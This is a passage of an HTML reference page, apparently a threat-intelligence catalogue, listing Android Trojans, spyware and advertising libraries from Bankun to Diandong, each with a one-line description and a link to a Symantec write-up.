<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-072316-5249-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-072316-5249-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bankun"><a class="anchor" href="#_bankun"></a><a class="link" href="#_bankun">Bankun</a></h3>
<div class="paragraph">
<p>Bankun is a Trojan horse for Android devices that replaces certain banking applications on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 65. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-072318-4143-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-072318-4143-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_basebridge"><a class="anchor" href="#_basebridge"></a><a class="link" href="#_basebridge">Basebridge</a></h3>
<div class="paragraph">
<p>Basebridge is a Trojan horse that attempts to send premium-rate SMS messages to predetermined numbers.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 66. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-060915-4938-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-060915-4938-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_basedao"><a class="anchor" href="#_basedao"></a><a class="link" href="#_basedao">Basedao</a></h3>
<div class="paragraph">
<p>Basedao is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 67. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-061715-3303-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-061715-3303-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_batterydoctor"><a class="anchor" href="#_batterydoctor"></a><a class="link" href="#_batterydoctor">Batterydoctor</a></h3>
<div class="paragraph">
<p>Batterydoctor is Trojan that makes exaggerated claims about the device&#8217;s ability to recharge the battery, as well as steal information.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 68. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-101916-0847-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-101916-0847-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_beaglespy"><a class="anchor" href="#_beaglespy"></a><a class="link" href="#_beaglespy">Beaglespy</a></h3>
<div class="paragraph">
<p>Beaglespy is an Android mobile detection for the Beagle spyware program as well as its associated client application.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 69. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-091010-0627-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-091010-0627-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_becuro"><a class="anchor" href="#_becuro"></a><a class="link" href="#_becuro">Becuro</a></h3>
<div class="paragraph">
<p>Becuro is a Trojan horse for Android devices that downloads potentially malicious files onto the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 70. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2015-051410-3348-99">https://www.symantec.com/security_response/writeup.jsp?docid=2015-051410-3348-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_beita"><a class="anchor" href="#_beita"></a><a class="link" href="#_beita">Beita</a></h3>
<div class="paragraph">
<p>Beita is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 71. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-110111-1829-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-110111-1829-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bgserv"><a class="anchor" href="#_bgserv"></a><a class="link" href="#_bgserv">Bgserv</a></h3>
<div class="paragraph">
<p>Bgserv is a Trojan that opens a back door and transmits information from the device to a remote location.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 72. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-031005-2918-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-031005-2918-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_biigespy"><a class="anchor" href="#_biigespy"></a><a class="link" href="#_biigespy">Biigespy</a></h3>
<div class="paragraph">
<p>Biigespy is an Android mobile detection for the Biige spyware program as well as its associated client application.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 73. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-091012-0526-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-091012-0526-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bmaster"><a class="anchor" href="#_bmaster"></a><a class="link" href="#_bmaster">Bmaster</a></h3>
<div class="paragraph">
<p>Bmaster is a Trojan horse on the Android platform that opens a back door, downloads files and steals potentially confidential information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 74. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-020609-3003-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-020609-3003-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bossefiv"><a class="anchor" href="#_bossefiv"></a><a class="link" href="#_bossefiv">Bossefiv</a></h3>
<div class="paragraph">
<p>Bossefiv is a Trojan horse for Android devices that steals information.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 75. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2015-061520-4322-99">https://www.symantec.com/security_response/writeup.jsp?docid=2015-061520-4322-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_boxpush"><a class="anchor" href="#_boxpush"></a><a class="link" href="#_boxpush">Boxpush</a></h3>
<div class="paragraph">
<p>Boxpush is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 76. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040207-4613-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040207-4613-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_burstly"><a class="anchor" href="#_burstly"></a><a class="link" href="#_burstly">Burstly</a></h3>
<div class="paragraph">
<p>Burstly is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 77. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-052918-1443-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-052918-1443-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_buzzcity"><a class="anchor" href="#_buzzcity"></a><a class="link" href="#_buzzcity">Buzzcity</a></h3>
<div class="paragraph">
<p>Buzzcity is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 78. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-052918-1454-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-052918-1454-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bypush"><a class="anchor" href="#_bypush"></a><a class="link" href="#_bypush">ByPush</a></h3>
<div class="paragraph">
<p>ByPush is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 79. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040315-4708-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040315-4708-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cajino"><a class="anchor" href="#_cajino"></a><a class="link" href="#_cajino">Cajino</a></h3>
<div class="paragraph">
<p>Cajino is a Trojan horse for Android devices that opens a back door on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 80. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2015-040210-3746-99">https://www.symantec.com/security_response/writeup.jsp?docid=2015-040210-3746-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_casee"><a class="anchor" href="#_casee"></a><a class="link" href="#_casee">Casee</a></h3>
<div class="paragraph">
<p>Casee is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 81. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-052919-3501-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-052919-3501-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_catchtoken"><a class="anchor" href="#_catchtoken"></a><a class="link" href="#_catchtoken">Catchtoken</a></h3>
<div class="paragraph">
<p>Catchtoken is a Trojan horse for Android devices that intercepts SMS messages and opens a back door on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 82. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-121619-0548-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-121619-0548-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cauly"><a class="anchor" href="#_cauly"></a><a class="link" href="#_cauly">Cauly</a></h3>
<div class="paragraph">
<p>Cauly is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 83. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-052919-3454-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-052919-3454-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cellshark"><a class="anchor" href="#_cellshark"></a><a class="link" href="#_cellshark">Cellshark</a></h3>
<div class="paragraph">
<p>Cellshark is a spyware application for Android devices that periodically gathers information from the device and uploads it to a predetermined location.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 84. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-111611-0914-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-111611-0914-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_centero"><a class="anchor" href="#_centero"></a><a class="link" href="#_centero">Centero</a></h3>
<div class="paragraph">
<p>Centero is a Trojan horse for Android devices that displays advertisements on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 85. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-053006-2502-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-053006-2502-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_chuli"><a class="anchor" href="#_chuli"></a><a class="link" href="#_chuli">Chuli</a></h3>
<div class="paragraph">
<p>Chuli is a Trojan horse for Android devices that opens a back door and may steal information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 86. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-032617-1604-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-032617-1604-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_citmo"><a class="anchor" href="#_citmo"></a><a class="link" href="#_citmo">Citmo</a></h3>
<div class="paragraph">
<p>Citmo is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 87. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-030715-5012-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-030715-5012-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_claco"><a class="anchor" href="#_claco"></a><a class="link" href="#_claco">Claco</a></h3>
<div class="paragraph">
<p>Claco is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 88. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-020415-5600-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-020415-5600-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_clevernet"><a class="anchor" href="#_clevernet"></a><a class="link" href="#_clevernet">Clevernet</a></h3>
<div class="paragraph">
<p>Clevernet is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 89. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040107-5257-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040107-5257-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cnappbox"><a class="anchor" href="#_cnappbox"></a><a class="link" href="#_cnappbox">Cnappbox</a></h3>
<div class="paragraph">
<p>Cnappbox is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 90. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040215-1141-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040215-1141-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cobblerone"><a class="anchor" href="#_cobblerone"></a><a class="link" href="#_cobblerone">Cobblerone</a></h3>
<div class="paragraph">
<p>Cobblerone is a spyware application for Android devices that can track the phone&#8217;s location and remotely erase the device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 91. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-111514-3846-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-111514-3846-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_coolpaperleak"><a class="anchor" href="#_coolpaperleak"></a><a class="link" href="#_coolpaperleak">Coolpaperleak</a></h3>
<div class="paragraph">
<p>Coolpaperleak is a Trojan horse for Android devices that steals information and sends it to a remote location.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 92. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-080211-5757-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-080211-5757-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_coolreaper"><a class="anchor" href="#_coolreaper"></a><a class="link" href="#_coolreaper">Coolreaper</a></h3>
<div class="paragraph">
<p>Coolreaper is a Trojan horse for Android devices that opens a back door on the compromised device. It may also steal information and download potentially malicious files.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 93. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2015-011220-3211-99">https://www.symantec.com/security_response/writeup.jsp?docid=2015-011220-3211-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cosha"><a class="anchor" href="#_cosha"></a><a class="link" href="#_cosha">Cosha</a></h3>
<div class="paragraph">
<p>Cosha is a spyware program for Android devices that monitors and sends certain information to a remote location.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 94. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-081712-5231-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-081712-5231-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_counterclank"><a class="anchor" href="#_counterclank"></a><a class="link" href="#_counterclank">Counterclank</a></h3>
<div class="paragraph">
<p>Counterclank is a Trojan horse for Android devices that steals information.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 95. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-012709-4046-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-012709-4046-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_crazymedia"><a class="anchor" href="#_crazymedia"></a><a class="link" href="#_crazymedia">Crazymedia</a></h3>
<div class="paragraph">
<p>Crazymedia is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 96. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040312-2547-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040312-2547-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_crisis"><a class="anchor" href="#_crisis"></a><a class="link" href="#_crisis">Crisis</a></h3>
<div class="paragraph">
<p>Crisis is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 97. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2015-071409-0636-99">https://www.symantec.com/security_response/writeup.jsp?docid=2015-071409-0636-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_crusewind"><a class="anchor" href="#_crusewind"></a><a class="link" href="#_crusewind">Crusewind</a></h3>
<div class="paragraph">
<p>Crusewind is a Trojan horse for Android devices that sends SMS messages to a premium-rate number.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 98. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-070301-5702-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-070301-5702-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dandro"><a class="anchor" href="#_dandro"></a><a class="link" href="#_dandro">Dandro</a></h3>
<div class="paragraph">
<p>Dandro is a Trojan horse for Android devices that allows a remote attacker to gain control over the device and steal information from it.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 99. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-012916-2128-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-012916-2128-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_daoyoudao"><a class="anchor" href="#_daoyoudao"></a><a class="link" href="#_daoyoudao">Daoyoudao</a></h3>
<div class="paragraph">
<p>Daoyoudao is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 100. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040214-5018-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040214-5018-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_deathring"><a class="anchor" href="#_deathring"></a><a class="link" href="#_deathring">Deathring</a></h3>
<div class="paragraph">
<p>Deathring is a Trojan horse for Android devices that may perform malicious activities on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 101. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-121116-4547-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-121116-4547-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_deeveemap"><a class="anchor" href="#_deeveemap"></a><a class="link" href="#_deeveemap">Deeveemap</a></h3>
<div class="paragraph">
<p>Deeveemap is a Trojan horse for Android devices that downloads potentially malicious files onto the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 102. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2017-060907-5221-99">https://www.symantec.com/security_response/writeup.jsp?docid=2017-060907-5221-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dendoroid"><a class="anchor" href="#_dendoroid"></a><a class="link" href="#_dendoroid">Dendoroid</a></h3>
<div class="paragraph">
<p>Dendoroid is a Trojan horse for Android devices that opens a back door, steals information, and may perform other malicious activities on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 103. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-030418-2633-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-030418-2633-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dengaru"><a class="anchor" href="#_dengaru"></a><a class="link" href="#_dengaru">Dengaru</a></h3>
<div class="paragraph">
<p>Dengaru is a Trojan horse for Android devices that performs click-fraud from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 104. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2015-051113-4819-99">https://www.symantec.com/security_response/writeup.jsp?docid=2015-051113-4819-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_diandong"><a class="anchor" href="#_diandong"></a><a class="link" href="#_diandong">Diandong</a></h3>
<div class="paragraph">
<p>Diandong is an advertisement library that is bundled with certain Android applications.</p>
</div>
